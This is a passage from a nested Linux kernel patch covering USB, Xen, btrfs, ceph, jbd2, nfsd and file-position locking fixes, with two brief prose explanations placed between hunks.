+ 	else
+ 		at91_start_clock(ohci_at91);
+ 
+-	ohci_resume(hcd, false);
++	/*
++	 * According to the comment in ohci_hcd_at91_drv_suspend(),
++	 * we need to do a reset if the 48 MHz clock was stopped,
++	 * that is, if ohci_at91->wakeup is clear. Tell ohci_resume()
++	 * to reset in this case by setting its "hibernated" flag.
++	 */
++	ohci_resume(hcd, !ohci_at91->wakeup);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/usb/host/xhci-mtk.c b/drivers/usb/host/xhci-mtk.c
+index c61fc19ef1154..a0921687444b1 100644
+--- a/drivers/usb/host/xhci-mtk.c
++++ b/drivers/usb/host/xhci-mtk.c
+@@ -590,6 +590,7 @@ static int xhci_mtk_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	device_init_wakeup(dev, true);
++	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+ 	xhci = hcd_to_xhci(hcd);
+ 	xhci->main_hcd = hcd;
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 5e72d02042ced..2aed88c28ef69 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -293,10 +293,8 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 			pdev->device == 0x3432)
+ 		xhci->quirks |= XHCI_BROKEN_STREAMS;
+ 
+-	if (pdev->vendor == PCI_VENDOR_ID_VIA && pdev->device == 0x3483) {
++	if (pdev->vendor == PCI_VENDOR_ID_VIA && pdev->device == 0x3483)
+ 		xhci->quirks |= XHCI_LPM_SUPPORT;
+-		xhci->quirks |= XHCI_EP_CTX_BROKEN_DCS;
+-	}
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_ASMEDIA &&
+ 		pdev->device == PCI_DEVICE_ID_ASMEDIA_1042_XHCI) {
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 7a7ab525675b7..281690c582cba 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -592,11 +592,8 @@ static int xhci_move_dequeue_past_td(struct xhci_hcd *xhci,
+ 	struct xhci_ring *ep_ring;
+ 	struct xhci_command *cmd;
+ 	struct xhci_segment *new_seg;
+-	struct xhci_segment *halted_seg = NULL;
+ 	union xhci_trb *new_deq;
+ 	int new_cycle;
+-	union xhci_trb *halted_trb;
+-	int index = 0;
+ 	dma_addr_t addr;
+ 	u64 hw_dequeue;
+ 	bool cycle_found = false;
+@@ -634,27 +631,7 @@ static int xhci_move_dequeue_past_td(struct xhci_hcd *xhci,
+ 	hw_dequeue = xhci_get_hw_deq(xhci, dev, ep_index, stream_id);
+ 	new_seg = ep_ring->deq_seg;
+ 	new_deq = ep_ring->dequeue;
+-
+-	/*
+-	 * Quirk: xHC write-back of the DCS field in the hardware dequeue
+-	 * pointer is wrong - use the cycle state of the TRB pointed to by
+-	 * the dequeue pointer.
+-	 */
+-	if (xhci->quirks & XHCI_EP_CTX_BROKEN_DCS &&
+-	    !(ep->ep_state & EP_HAS_STREAMS))
+-		halted_seg = trb_in_td(xhci, td->start_seg,
+-				       td->first_trb, td->last_trb,
+-				       hw_dequeue & ~0xf, false);
+-	if (halted_seg) {
+-		index = ((dma_addr_t)(hw_dequeue & ~0xf) - halted_seg->dma) /
+-			 sizeof(*halted_trb);
+-		halted_trb = &halted_seg->trbs[index];
+-		new_cycle = halted_trb->generic.field[3] & 0x1;
+-		xhci_dbg(xhci, "Endpoint DCS = %d TRB index = %d cycle = %d\n",
+-			 (u8)(hw_dequeue & 0x1), index, new_cycle);
+-	} else {
+-		new_cycle = hw_dequeue & 0x1;
+-	}
++	new_cycle = hw_dequeue & 0x1;
+ 
+ 	/*
+ 	 * We want to find the pointer, segment and cycle state of the new trb
+diff --git a/drivers/usb/host/xhci-tegra.c b/drivers/usb/host/xhci-tegra.c
+index 32df571bb2339..51eabc5e87701 100644
+--- a/drivers/usb/host/xhci-tegra.c
++++ b/drivers/usb/host/xhci-tegra.c
+@@ -1010,15 +1010,15 @@ static int tegra_xusb_powerdomain_init(struct device *dev,
+ 	int err;
+ 
+ 	tegra->genpd_dev_host = dev_pm_domain_attach_by_name(dev, "xusb_host");
+-	if (IS_ERR_OR_NULL(tegra->genpd_dev_host)) {
+-		err = PTR_ERR(tegra->genpd_dev_host) ? : -ENODATA;
++	if (IS_ERR(tegra->genpd_dev_host)) {
++		err = PTR_ERR(tegra->genpd_dev_host);
+ 		dev_err(dev, "failed to get host pm-domain: %d\n", err);
+ 		return err;
+ 	}
+ 
+ 	tegra->genpd_dev_ss = dev_pm_domain_attach_by_name(dev, "xusb_ss");
+-	if (IS_ERR_OR_NULL(tegra->genpd_dev_ss)) {
+-		err = PTR_ERR(tegra->genpd_dev_ss) ? : -ENODATA;
++	if (IS_ERR(tegra->genpd_dev_ss)) {
++		err = PTR_ERR(tegra->genpd_dev_ss);
+ 		dev_err(dev, "failed to get superspeed pm-domain: %d\n", err);
+ 		return err;
+ 	}
+diff --git a/drivers/usb/misc/ehset.c b/drivers/usb/misc/ehset.c
+index 986d6589f0535..36b6e9fa7ffb6 100644
+--- a/drivers/usb/misc/ehset.c
++++ b/drivers/usb/misc/ehset.c
+@@ -77,7 +77,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 	switch (test_pid) {
+ 	case TEST_SE0_NAK_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+@@ -86,7 +86,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 		break;
+ 	case TEST_J_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+@@ -95,7 +95,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 		break;
+ 	case TEST_K_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+@@ -104,7 +104,7 @@ static int ehset_probe(struct usb_interface *intf,
+ 		break;
+ 	case TEST_PACKET_PID:
+ 		ret = ehset_prepare_port_for_testing(hub_udev, portnum);
+-		if (!ret)
++		if (ret < 0)
+ 			break;
+ 		ret = usb_control_msg_send(hub_udev, 0, USB_REQ_SET_FEATURE,
+ 					   USB_RT_PORT, USB_PORT_FEAT_TEST,
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 6692440c1e0a3..119641761c3b4 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -251,6 +251,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EM061K_LTA		0x0123
+ #define QUECTEL_PRODUCT_EM061K_LMS		0x0124
+ #define QUECTEL_PRODUCT_EC25			0x0125
++#define QUECTEL_PRODUCT_EM060K_128		0x0128
+ #define QUECTEL_PRODUCT_EG91			0x0191
+ #define QUECTEL_PRODUCT_EG95			0x0195
+ #define QUECTEL_PRODUCT_BG96			0x0296
+@@ -268,6 +269,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+ #define QUECTEL_PRODUCT_EC200U			0x0901
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
++#define QUECTEL_PRODUCT_EC200A			0x6005
+ #define QUECTEL_PRODUCT_EM061K_LWW		0x6008
+ #define QUECTEL_PRODUCT_EM061K_LCN		0x6009
+ #define QUECTEL_PRODUCT_EC200T			0x6026
+@@ -1197,6 +1199,9 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x40) },
+@@ -1225,6 +1230,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, 0x0900, 0xff, 0, 0), /* RM500U-CN */
+ 	  .driver_info = ZLP },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200A, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+diff --git a/drivers/usb/serial/usb-serial-simple.c b/drivers/usb/serial/usb-serial-simple.c
+index 4c6747889a194..24b8772a345e2 100644
+--- a/drivers/usb/serial/usb-serial-simple.c
++++ b/drivers/usb/serial/usb-serial-simple.c
+@@ -38,16 +38,6 @@ static struct usb_serial_driver vendor##_device = {		\
+ 	{ USB_DEVICE(0x0a21, 0x8001) }	/* MMT-7305WW */
+ DEVICE(carelink, CARELINK_IDS);
+ 
+-/* ZIO Motherboard USB driver */
+-#define ZIO_IDS()			\
+-	{ USB_DEVICE(0x1CBE, 0x0103) }
+-DEVICE(zio, ZIO_IDS);
+-
+-/* Funsoft Serial USB driver */
+-#define FUNSOFT_IDS()			\
+-	{ USB_DEVICE(0x1404, 0xcddc) }
+-DEVICE(funsoft, FUNSOFT_IDS);
+-
+ /* Infineon Flashloader driver */
+ #define FLASHLOADER_IDS()		\
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x058b, 0x0041, USB_CLASS_CDC_DATA) }, \
+@@ -55,6 +45,11 @@ DEVICE(funsoft, FUNSOFT_IDS);
+ 	{ USB_DEVICE(0x8087, 0x0801) }
+ DEVICE(flashloader, FLASHLOADER_IDS);
+ 
++/* Funsoft Serial USB driver */
++#define FUNSOFT_IDS()			\
++	{ USB_DEVICE(0x1404, 0xcddc) }
++DEVICE(funsoft, FUNSOFT_IDS);
++
+ /* Google Serial USB SubClass */
+ #define GOOGLE_IDS()						\
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x18d1,			\
+@@ -63,16 +58,21 @@ DEVICE(flashloader, FLASHLOADER_IDS);
+ 					0x01) }
+ DEVICE(google, GOOGLE_IDS);
+ 
++/* HP4x (48/49) Generic Serial driver */
++#define HP4X_IDS()			\
++	{ USB_DEVICE(0x03f0, 0x0121) }
++DEVICE(hp4x, HP4X_IDS);
++
++/* KAUFMANN RKS+CAN VCP */
++#define KAUFMANN_IDS()			\
++	{ USB_DEVICE(0x16d0, 0x0870) }
++DEVICE(kaufmann, KAUFMANN_IDS);
++
+ /* Libtransistor USB console */
+ #define LIBTRANSISTOR_IDS()			\
+ 	{ USB_DEVICE(0x1209, 0x8b00) }
+ DEVICE(libtransistor, LIBTRANSISTOR_IDS);
+ 
+-/* ViVOpay USB Serial Driver */
+-#define VIVOPAY_IDS()			\
+-	{ USB_DEVICE(0x1d5f, 0x1004) }	/* ViVOpay 8800 */
+-DEVICE(vivopay, VIVOPAY_IDS);
+-
+ /* Motorola USB Phone driver */
+ #define MOTO_IDS()			\
+ 	{ USB_DEVICE(0x05c6, 0x3197) },	/* unknown Motorola phone */	\
+@@ -101,10 +101,10 @@ DEVICE(nokia, NOKIA_IDS);
+ 	{ USB_DEVICE(0x09d7, 0x0100) }	/* NovAtel FlexPack GPS */
+ DEVICE_N(novatel_gps, NOVATEL_IDS, 3);
+ 
+-/* HP4x (48/49) Generic Serial driver */
+-#define HP4X_IDS()			\
+-	{ USB_DEVICE(0x03f0, 0x0121) }
+-DEVICE(hp4x, HP4X_IDS);
++/* Siemens USB/MPI adapter */
++#define SIEMENS_IDS()			\
++	{ USB_DEVICE(0x908, 0x0004) }
++DEVICE(siemens_mpi, SIEMENS_IDS);
+ 
+ /* Suunto ANT+ USB Driver */
+ #define SUUNTO_IDS()			\
+@@ -112,45 +112,52 @@ DEVICE(hp4x, HP4X_IDS);
+ 	{ USB_DEVICE(0x0fcf, 0x1009) } /* Dynastream ANT USB-m Stick */
+ DEVICE(suunto, SUUNTO_IDS);
+ 
+-/* Siemens USB/MPI adapter */
+-#define SIEMENS_IDS()			\
+-	{ USB_DEVICE(0x908, 0x0004) }
+-DEVICE(siemens_mpi, SIEMENS_IDS);
++/* ViVOpay USB Serial Driver */
++#define VIVOPAY_IDS()			\
++	{ USB_DEVICE(0x1d5f, 0x1004) }	/* ViVOpay 8800 */
++DEVICE(vivopay, VIVOPAY_IDS);
++
++/* ZIO Motherboard USB driver */
++#define ZIO_IDS()			\
++	{ USB_DEVICE(0x1CBE, 0x0103) }
++DEVICE(zio, ZIO_IDS);
+ 
+ /* All of the above structures mushed into two lists */
+ static struct usb_serial_driver * const serial_drivers[] = {
+ 	&carelink_device,
+-	&zio_device,
+-	&funsoft_device,
+ 	&flashloader_device,
++	&funsoft_device,
+ 	&google_device,
++	&hp4x_device,
++	&kaufmann_device,
+ 	&libtransistor_device,
+-	&vivopay_device,
+ 	&moto_modem_device,
+ 	&motorola_tetra_device,
+ 	&nokia_device,
+ 	&novatel_gps_device,
+-	&hp4x_device,
+-	&suunto_device,
+ 	&siemens_mpi_device,
++	&suunto_device,
++	&vivopay_device,
++	&zio_device,
+ 	NULL
+ };
+ 
+ static const struct usb_device_id id_table[] = {
+ 	CARELINK_IDS(),
+-	ZIO_IDS(),
+-	FUNSOFT_IDS(),
+ 	FLASHLOADER_IDS(),
++	FUNSOFT_IDS(),
+ 	GOOGLE_IDS(),
++	HP4X_IDS(),
++	KAUFMANN_IDS(),
+ 	LIBTRANSISTOR_IDS(),
+-	VIVOPAY_IDS(),
+ 	MOTO_IDS(),
+ 	MOTOROLA_TETRA_IDS(),
+ 	NOKIA_IDS(),
+ 	NOVATEL_IDS(),
+-	HP4X_IDS(),
+-	SUUNTO_IDS(),
+ 	SIEMENS_IDS(),
++	SUUNTO_IDS(),
++	VIVOPAY_IDS(),
++	ZIO_IDS(),
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(usb, id_table);
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index bd5e5dd704313..3c3bab33e03a5 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -1258,8 +1258,7 @@ static ssize_t select_usb_power_delivery_show(struct device *dev,
+ {
+ 	struct typec_port *port = to_typec_port(dev);
+ 	struct usb_power_delivery **pds;
+-	struct usb_power_delivery *pd;
+-	int ret = 0;
++	int i, ret = 0;
+ 
+ 	if (!port->ops || !port->ops->pd_get)
+ 		return -EOPNOTSUPP;
+@@ -1268,11 +1267,11 @@ static ssize_t select_usb_power_delivery_show(struct device *dev,
+ 	if (!pds)
+ 		return 0;
+ 
+-	for (pd = pds[0]; pd; pd++) {
+-		if (pd == port->pd)
+-			ret += sysfs_emit(buf + ret, "[%s] ", dev_name(&pd->dev));
++	for (i = 0; pds[i]; i++) {
++		if (pds[i] == port->pd)
++			ret += sysfs_emit_at(buf, ret, "[%s] ", dev_name(&pds[i]->dev));
+ 		else
+-			ret += sysfs_emit(buf + ret, "%s ", dev_name(&pd->dev));
++			ret += sysfs_emit_at(buf, ret, "%s ", dev_name(&pds[i]->dev));
+ 	}
+ 
+ 	buf[ret - 1] = '\n';
+@@ -2259,6 +2258,8 @@ struct typec_port *typec_register_port(struct device *parent,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	port->pd = cap->pd;
++
+ 	ret = device_add(&port->dev);
+ 	if (ret) {
+ 		dev_err(parent, "failed to register port (%d)\n", ret);
+@@ -2266,7 +2267,7 @@ struct typec_port *typec_register_port(struct device *parent,
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	ret = typec_port_set_usb_power_delivery(port, cap->pd);
++	ret = usb_power_delivery_link_device(port->pd, &port->dev);
+ 	if (ret) {
+ 		dev_err(&port->dev, "failed to link pd\n");
+ 		device_unregister(&port->dev);
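The show() fix walks pds as what it actually is, a NULL-terminated array of pointers, and switches to sysfs_emit_at(), which takes the running offset as an explicit argument instead of pointer arithmetic on buf. Reduced to the loop shape (illustrative):

    int i, len = 0;

    for (i = 0; pds[i]; i++)                 /* pds[] is NULL-terminated */
            len += sysfs_emit_at(buf, len, "%s ", dev_name(&pds[i]->dev));
    buf[len - 1] = '\n';                     /* turn the last space into a newline */

The old loop incremented the struct pointer itself (pd++), stepping through memory in sizeof(*pd) strides rather than through the array of pointers.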
+diff --git a/drivers/xen/grant-table.c b/drivers/xen/grant-table.c
+index e1ec725c2819d..f13c3b76ad1eb 100644
+--- a/drivers/xen/grant-table.c
++++ b/drivers/xen/grant-table.c
+@@ -498,14 +498,21 @@ static LIST_HEAD(deferred_list);
+ static void gnttab_handle_deferred(struct timer_list *);
+ static DEFINE_TIMER(deferred_timer, gnttab_handle_deferred);
+ 
++static atomic64_t deferred_count;
++static atomic64_t leaked_count;
++static unsigned int free_per_iteration = 10;
++module_param(free_per_iteration, uint, 0600);
++
+ static void gnttab_handle_deferred(struct timer_list *unused)
+ {
+-	unsigned int nr = 10;
++	unsigned int nr = READ_ONCE(free_per_iteration);
++	const bool ignore_limit = nr == 0;
+ 	struct deferred_entry *first = NULL;
+ 	unsigned long flags;
++	size_t freed = 0;
+ 
+ 	spin_lock_irqsave(&gnttab_list_lock, flags);
+-	while (nr--) {
++	while ((ignore_limit || nr--) && !list_empty(&deferred_list)) {
+ 		struct deferred_entry *entry
+ 			= list_first_entry(&deferred_list,
+ 					   struct deferred_entry, list);
+@@ -515,10 +522,14 @@ static void gnttab_handle_deferred(struct timer_list *unused)
+ 		list_del(&entry->list);
+ 		spin_unlock_irqrestore(&gnttab_list_lock, flags);
+ 		if (_gnttab_end_foreign_access_ref(entry->ref)) {
++			uint64_t ret = atomic64_dec_return(&deferred_count);
++
+ 			put_free_entry(entry->ref);
+-			pr_debug("freeing g.e. %#x (pfn %#lx)\n",
+-				 entry->ref, page_to_pfn(entry->page));
++			pr_debug("freeing g.e. %#x (pfn %#lx), %llu remaining\n",
++				 entry->ref, page_to_pfn(entry->page),
++				 (unsigned long long)ret);
+ 			put_page(entry->page);
++			freed++;
+ 			kfree(entry);
+ 			entry = NULL;
+ 		} else {
+@@ -530,21 +541,22 @@ static void gnttab_handle_deferred(struct timer_list *unused)
+ 		spin_lock_irqsave(&gnttab_list_lock, flags);
+ 		if (entry)
+ 			list_add_tail(&entry->list, &deferred_list);
+-		else if (list_empty(&deferred_list))
+-			break;
+ 	}
+-	if (!list_empty(&deferred_list) && !timer_pending(&deferred_timer)) {
++	if (list_empty(&deferred_list))
++		WARN_ON(atomic64_read(&deferred_count));
++	else if (!timer_pending(&deferred_timer)) {
+ 		deferred_timer.expires = jiffies + HZ;
+ 		add_timer(&deferred_timer);
+ 	}
+ 	spin_unlock_irqrestore(&gnttab_list_lock, flags);
++	pr_debug("Freed %zu references", freed);
+ }
+ 
+ static void gnttab_add_deferred(grant_ref_t ref, struct page *page)
+ {
+ 	struct deferred_entry *entry;
+ 	gfp_t gfp = (in_atomic() || irqs_disabled()) ? GFP_ATOMIC : GFP_KERNEL;
+-	const char *what = KERN_WARNING "leaking";
++	uint64_t leaked, deferred;
+ 
+ 	entry = kmalloc(sizeof(*entry), gfp);
+ 	if (!page) {
+@@ -567,10 +579,16 @@ static void gnttab_add_deferred(grant_ref_t ref, struct page *page)
+ 			add_timer(&deferred_timer);
+ 		}
+ 		spin_unlock_irqrestore(&gnttab_list_lock, flags);
+-		what = KERN_DEBUG "deferring";
++		deferred = atomic64_inc_return(&deferred_count);
++		leaked = atomic64_read(&leaked_count);
++		pr_debug("deferring g.e. %#x (pfn %#lx) (total deferred %llu, total leaked %llu)\n",
++			 ref, page ? page_to_pfn(page) : -1, deferred, leaked);
++	} else {
++		deferred = atomic64_read(&deferred_count);
++		leaked = atomic64_inc_return(&leaked_count);
++		pr_warn("leaking g.e. %#x (pfn %#lx) (total deferred %llu, total leaked %llu)\n",
++			ref, page ? page_to_pfn(page) : -1, deferred, leaked);
+ 	}
+-	printk("%s g.e. %#x (pfn %#lx)\n",
+-	       what, ref, page ? page_to_pfn(page) : -1);
+ }
+ 
+ int gnttab_try_end_foreign_access(grant_ref_t ref)
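The batch size is now a writable module parameter, so it can be tuned at runtime; assuming the standard sysfs path for built-in module parameters, writing 0 to /sys/module/grant_table/parameters/free_per_iteration disables the limit and drains the whole deferred list on each timer tick.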
+diff --git a/drivers/xen/xenbus/xenbus_probe.c b/drivers/xen/xenbus/xenbus_probe.c
+index 58b732dcbfb83..639bf628389ba 100644
+--- a/drivers/xen/xenbus/xenbus_probe.c
++++ b/drivers/xen/xenbus/xenbus_probe.c
+@@ -811,6 +811,9 @@ static int xenbus_probe_thread(void *unused)
+ 
+ static int __init xenbus_probe_initcall(void)
+ {
++	if (!xen_domain())
++		return -ENODEV;
++
+ 	/*
+ 	 * Probe XenBus here in the XS_PV case, and also XS_HVM unless we
+ 	 * need to wait for the platform PCI device to come up or
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 2044f1e186297..507b44d18572d 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -377,6 +377,11 @@ void btrfs_update_global_block_rsv(struct btrfs_fs_info *fs_info)
+ 	}
+ 	read_unlock(&fs_info->global_root_lock);
+ 
++	if (btrfs_fs_compat_ro(fs_info, BLOCK_GROUP_TREE)) {
++		num_bytes += btrfs_root_used(&fs_info->block_group_root->root_item);
++		min_items++;
++	}
++
+ 	/*
+ 	 * But we also want to reserve enough space so we can do the fallback
+ 	 * global reserve for an unlink, which is an additional 5 items (see the
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index cacdb2c5d1528..26cabffd59710 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1227,12 +1227,23 @@ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ 	int ret = 0;
+ 
+ 	/*
+-	 * We need to have subvol_sem write locked, to prevent races between
+-	 * concurrent tasks trying to disable quotas, because we will unlock
+-	 * and relock qgroup_ioctl_lock across BTRFS_FS_QUOTA_ENABLED changes.
++	 * We need to have subvol_sem write locked to prevent races with
++	 * snapshot creation.
+ 	 */
+ 	lockdep_assert_held_write(&fs_info->subvol_sem);
+ 
++	/*
++	 * Lock the cleaner mutex to prevent races with concurrent relocation,
++	 * because relocation may be building backrefs for blocks of the quota
++	 * root while we are deleting the root. This is like dropping fs roots
++	 * of deleted snapshots/subvolumes, we need the same protection.
++	 *
++	 * This also prevents races between concurrent tasks trying to disable
++	 * quotas, because we will unlock and relock qgroup_ioctl_lock across
++	 * BTRFS_FS_QUOTA_ENABLED changes.
++	 */
++	mutex_lock(&fs_info->cleaner_mutex);
++
+ 	mutex_lock(&fs_info->qgroup_ioctl_lock);
+ 	if (!fs_info->quota_root)
+ 		goto out;
+@@ -1314,6 +1325,7 @@ out:
+ 		btrfs_end_transaction(trans);
+ 	else if (trans)
+ 		ret = btrfs_end_transaction(trans);
++	mutex_unlock(&fs_info->cleaner_mutex);
+ 
+ 	return ret;
+ }
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 682b463a7633a..2b776fce1c0ff 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -814,8 +814,13 @@ btrfs_attach_transaction_barrier(struct btrfs_root *root)
+ 
+ 	trans = start_transaction(root, 0, TRANS_ATTACH,
+ 				  BTRFS_RESERVE_NO_FLUSH, true);
+-	if (trans == ERR_PTR(-ENOENT))
+-		btrfs_wait_for_commit(root->fs_info, 0);
++	if (trans == ERR_PTR(-ENOENT)) {
++		int ret;
++
++		ret = btrfs_wait_for_commit(root->fs_info, 0);
++		if (ret)
++			return ERR_PTR(ret);
++	}
+ 
+ 	return trans;
+ }
+@@ -919,6 +924,7 @@ int btrfs_wait_for_commit(struct btrfs_fs_info *fs_info, u64 transid)
+ 	}
+ 
+ 	wait_for_commit(cur_trans, TRANS_STATE_COMPLETED);
++	ret = cur_trans->aborted;
+ 	btrfs_put_transaction(cur_trans);
+ out:
+ 	return ret;
+diff --git a/fs/ceph/metric.c b/fs/ceph/metric.c
+index c47347d2e84e3..9560b7bc6009a 100644
+--- a/fs/ceph/metric.c
++++ b/fs/ceph/metric.c
+@@ -208,7 +208,7 @@ static void metric_delayed_work(struct work_struct *work)
+ 	struct ceph_mds_client *mdsc =
+ 		container_of(m, struct ceph_mds_client, metric);
+ 
+-	if (mdsc->stopping)
++	if (mdsc->stopping || disable_send_metrics)
+ 		return;
+ 
+ 	if (!m->session || !check_session_state(m->session)) {
+diff --git a/fs/file.c b/fs/file.c
+index 7893ea161d770..35c62b54c9d65 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -1042,10 +1042,8 @@ unsigned long __fdget_pos(unsigned int fd)
+ 	struct file *file = (struct file *)(v & ~3);
+ 
+ 	if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
+-		if (file_count(file) > 1) {
+-			v |= FDPUT_POS_UNLOCK;
+-			mutex_lock(&file->f_pos_lock);
+-		}
++		v |= FDPUT_POS_UNLOCK;
++		mutex_lock(&file->f_pos_lock);
+ 	}
+ 	return v;
+ }
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index 25e3c20eb19f6..c4e0da6db7195 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -221,20 +221,6 @@ restart:
+ 		jh = transaction->t_checkpoint_list;
+ 		bh = jh2bh(jh);
+ 
+-		/*
+-		 * The buffer may be writing back, or flushing out in the
+-		 * last couple of cycles, or re-adding into a new transaction,
+-		 * need to check it again until it's unlocked.
+-		 */
+-		if (buffer_locked(bh)) {
+-			get_bh(bh);
+-			spin_unlock(&journal->j_list_lock);
+-			wait_on_buffer(bh);
+-			/* the journal_head may have gone by now */
+-			BUFFER_TRACE(bh, "brelse");
+-			__brelse(bh);
+-			goto retry;
+-		}
+ 		if (jh->b_transaction != NULL) {
+ 			transaction_t *t = jh->b_transaction;
+ 			tid_t tid = t->t_tid;
+@@ -269,7 +255,22 @@ restart:
+ 			spin_lock(&journal->j_list_lock);
+ 			goto restart;
+ 		}
+-		if (!buffer_dirty(bh)) {
++		if (!trylock_buffer(bh)) {
++			/*
++			 * The buffer is locked: it may be writing back,
++			 * flushing out in the last couple of cycles, or
++			 * being re-added to a new transaction, so check it
++			 * again once it is unlocked.
++			 */
++			get_bh(bh);
++			spin_unlock(&journal->j_list_lock);
++			wait_on_buffer(bh);
++			/* the journal_head may have gone by now */
++			BUFFER_TRACE(bh, "brelse");
++			__brelse(bh);
++			goto retry;
++		} else if (!buffer_dirty(bh)) {
++			unlock_buffer(bh);
+ 			BUFFER_TRACE(bh, "remove from checkpoint");
+ 			/*
+ 			 * If the transaction was released or the checkpoint
+@@ -279,6 +280,7 @@ restart:
+ 			    !transaction->t_checkpoint_list)
+ 				goto out;
+ 		} else {
++			unlock_buffer(bh);
+ 			/*
+ 			 * We are about to write the buffer, it could be
+ 			 * raced by some other transaction shrink or buffer
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 34561764e5c97..c5dc0cd6f7031 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -6269,8 +6269,6 @@ static __be32 nfsd4_validate_stateid(struct nfs4_client *cl, stateid_t *stateid)
+ 	if (ZERO_STATEID(stateid) || ONE_STATEID(stateid) ||
+ 		CLOSE_STATEID(stateid))
+ 		return status;
+-	if (!same_clid(&stateid->si_opaque.so_clid, &cl->cl_clientid))
+-		return status;
+ 	spin_lock(&cl->cl_lock);
+ 	s = find_stateid_locked(cl, stateid);
